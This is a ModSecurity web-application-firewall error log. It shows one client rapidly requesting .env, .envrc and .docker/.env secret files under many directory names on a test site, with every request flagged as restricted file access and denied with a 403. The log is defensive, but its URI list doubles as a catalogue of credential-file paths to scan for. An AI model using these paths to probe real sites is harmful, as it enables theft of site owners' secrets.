[Thu Jan 08 21:17:54.661218 2026] [:error] [pid 1270039] [client 18.119.100.98:54006] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.local"] [unique_id "aWAQ8pccQYhM1DUhi_W7DAAAAAQ"]
[Thu Jan 08 21:17:54.661365 2026] [:error] [pid 1270039] [client 18.119.100.98:54006] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/market/.env.local"] [unique_id "aWAQ8pccQYhM1DUhi_W7DAAAAAQ"]
[Thu Jan 08 21:17:55.019555 2026] [:error] [pid 1270043] [client 18.119.100.98:54186] [client 18.119.100.98] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aWAQ8wvEr1EpOYnVfM6rxwAAAAc"]
[Thu Jan 08 21:17:55.019838 2026] [:error] [pid 1270043] [client 18.119.100.98:54186] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aWAQ8wvEr1EpOYnVfM6rxwAAAAc"]
[Thu Jan 08 21:17:55.019998 2026] [:error] [pid 1270043] [client 18.119.100.98:54186] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aWAQ8wvEr1EpOYnVfM6rxwAAAAc"]
[Thu Jan 08 21:17:55.363760 2026] [:error] [pid 1270035] [client 18.119.100.98:54356] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aWAQ8yYqm_i2BUcmtQb4vAAAAAA"]
[Thu Jan 08 21:17:55.364024 2026] [:error] [pid 1270035] [client 18.119.100.98:54356] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aWAQ8yYqm_i2BUcmtQb4vAAAAAA"]
[Thu Jan 08 21:17:55.364200 2026] [:error] [pid 1270035] [client 18.119.100.98:54356] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aWAQ8yYqm_i2BUcmtQb4vAAAAAA"]
[Thu Jan 08 21:17:55.712983 2026] [:error] [pid 1270041] [client 18.119.100.98:54490] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env"] [unique_id "aWAQ883GwEx_BV8-CrWUSAAAAAU"]
[Thu Jan 08 21:17:55.713206 2026] [:error] [pid 1270041] [client 18.119.100.98:54490] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env"] [unique_id "aWAQ883GwEx_BV8-CrWUSAAAAAU"]
[Thu Jan 08 21:17:55.713358 2026] [:error] [pid 1270041] [client 18.119.100.98:54490] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env"] [unique_id "aWAQ883GwEx_BV8-CrWUSAAAAAU"]
[Thu Jan 08 21:17:56.058610 2026] [:error] [pid 1270042] [client 18.119.100.98:54650] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.production"] [unique_id "aWAQ9C7RlX2cRjHcFz6xxAAAAAY"]
[Thu Jan 08 21:17:56.058815 2026] [:error] [pid 1270042] [client 18.119.100.98:54650] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.production"] [unique_id "aWAQ9C7RlX2cRjHcFz6xxAAAAAY"]
[Thu Jan 08 21:17:56.058980 2026] [:error] [pid 1270042] [client 18.119.100.98:54650] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.production"] [unique_id "aWAQ9C7RlX2cRjHcFz6xxAAAAAY"]
[Thu Jan 08 21:17:56.405576 2026] [:error] [pid 1283304] [client 18.119.100.98:54806] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "aWAQ9GAwUIZgFNkik8yVPwAAAAg"]
[Thu Jan 08 21:17:56.405803 2026] [:error] [pid 1283304] [client 18.119.100.98:54806] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "aWAQ9GAwUIZgFNkik8yVPwAAAAg"]
[Thu Jan 08 21:17:56.405963 2026] [:error] [pid 1283304] [client 18.119.100.98:54806] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "aWAQ9GAwUIZgFNkik8yVPwAAAAg"]
[Thu Jan 08 21:17:56.755884 2026] [:error] [pid 1270036] [client 18.119.100.98:54954] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.production"] [unique_id "aWAQ9OM1154Q6b0hewij6AAAAAE"]
[Thu Jan 08 21:17:56.756091 2026] [:error] [pid 1270036] [client 18.119.100.98:54954] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.production"] [unique_id "aWAQ9OM1154Q6b0hewij6AAAAAE"]
[Thu Jan 08 21:17:56.756256 2026] [:error] [pid 1270036] [client 18.119.100.98:54954] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.production"] [unique_id "aWAQ9OM1154Q6b0hewij6AAAAAE"]
[Thu Jan 08 21:17:57.102477 2026] [:error] [pid 1270037] [client 18.119.100.98:55114] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.production"] [unique_id "aWAQ9eA_IfWyU2EIiRhOiAAAAAI"]
[Thu Jan 08 21:17:57.102689 2026] [:error] [pid 1270037] [client 18.119.100.98:55114] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.production"] [unique_id "aWAQ9eA_IfWyU2EIiRhOiAAAAAI"]
[Thu Jan 08 21:17:57.102848 2026] [:error] [pid 1270037] [client 18.119.100.98:55114] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env.production"] [unique_id "aWAQ9eA_IfWyU2EIiRhOiAAAAAI"]
[Thu Jan 08 21:17:57.451341 2026] [:error] [pid 1280390] [client 18.119.100.98:55292] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.local"] [unique_id "aWAQ9dKTJIy7S9W5nL2LQwAAAAk"]
[Thu Jan 08 21:17:57.451550 2026] [:error] [pid 1280390] [client 18.119.100.98:55292] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.local"] [unique_id "aWAQ9dKTJIy7S9W5nL2LQwAAAAk"]
[Thu Jan 08 21:17:57.451703 2026] [:error] [pid 1280390] [client 18.119.100.98:55292] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.local"] [unique_id "aWAQ9dKTJIy7S9W5nL2LQwAAAAk"]
[Thu Jan 08 21:17:57.799816 2026] [:error] [pid 1270038] [client 18.119.100.98:55444] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.environment"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "aWAQ9RmwMJtANIcuNUXpKAAAAAM"]
[Thu Jan 08 21:17:57.800131 2026] [:error] [pid 1270038] [client 18.119.100.98:55444] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "aWAQ9RmwMJtANIcuNUXpKAAAAAM"]
[Thu Jan 08 21:17:57.800373 2026] [:error] [pid 1270038] [client 18.119.100.98:55444] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.environment"] [unique_id "aWAQ9RmwMJtANIcuNUXpKAAAAAM"]
[Thu Jan 08 21:17:58.149924 2026] [:error] [pid 1270039] [client 18.119.100.98:55630] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.staging"] [unique_id "aWAQ9pccQYhM1DUhi_W7DQAAAAQ"]
[Thu Jan 08 21:17:58.150143 2026] [:error] [pid 1270039] [client 18.119.100.98:55630] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.staging"] [unique_id "aWAQ9pccQYhM1DUhi_W7DQAAAAQ"]
[Thu Jan 08 21:17:58.150300 2026] [:error] [pid 1270039] [client 18.119.100.98:55630] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.staging"] [unique_id "aWAQ9pccQYhM1DUhi_W7DQAAAAQ"]
[Thu Jan 08 21:17:58.496916 2026] [:error] [pid 1270043] [client 18.119.100.98:55786] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.local"] [unique_id "aWAQ9gvEr1EpOYnVfM6ryAAAAAc"]
[Thu Jan 08 21:17:58.497128 2026] [:error] [pid 1270043] [client 18.119.100.98:55786] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.local"] [unique_id "aWAQ9gvEr1EpOYnVfM6ryAAAAAc"]
[Thu Jan 08 21:17:58.497294 2026] [:error] [pid 1270043] [client 18.119.100.98:55786] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.local"] [unique_id "aWAQ9gvEr1EpOYnVfM6ryAAAAAc"]
[Thu Jan 08 21:17:58.843287 2026] [:error] [pid 1270035] [client 18.119.100.98:55958] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "aWAQ9iYqm_i2BUcmtQb4vQAAAAA"]
[Thu Jan 08 21:17:58.843504 2026] [:error] [pid 1270035] [client 18.119.100.98:55958] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "aWAQ9iYqm_i2BUcmtQb4vQAAAAA"]
[Thu Jan 08 21:17:58.844030 2026] [:error] [pid 1270035] [client 18.119.100.98:55958] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env.production"] [unique_id "aWAQ9iYqm_i2BUcmtQb4vQAAAAA"]
[Thu Jan 08 21:17:59.189868 2026] [:error] [pid 1270041] [client 18.119.100.98:56120] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.staging"] [unique_id "aWAQ983GwEx_BV8-CrWUSQAAAAU"]
[Thu Jan 08 21:17:59.190079 2026] [:error] [pid 1270041] [client 18.119.100.98:56120] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.staging"] [unique_id "aWAQ983GwEx_BV8-CrWUSQAAAAU"]
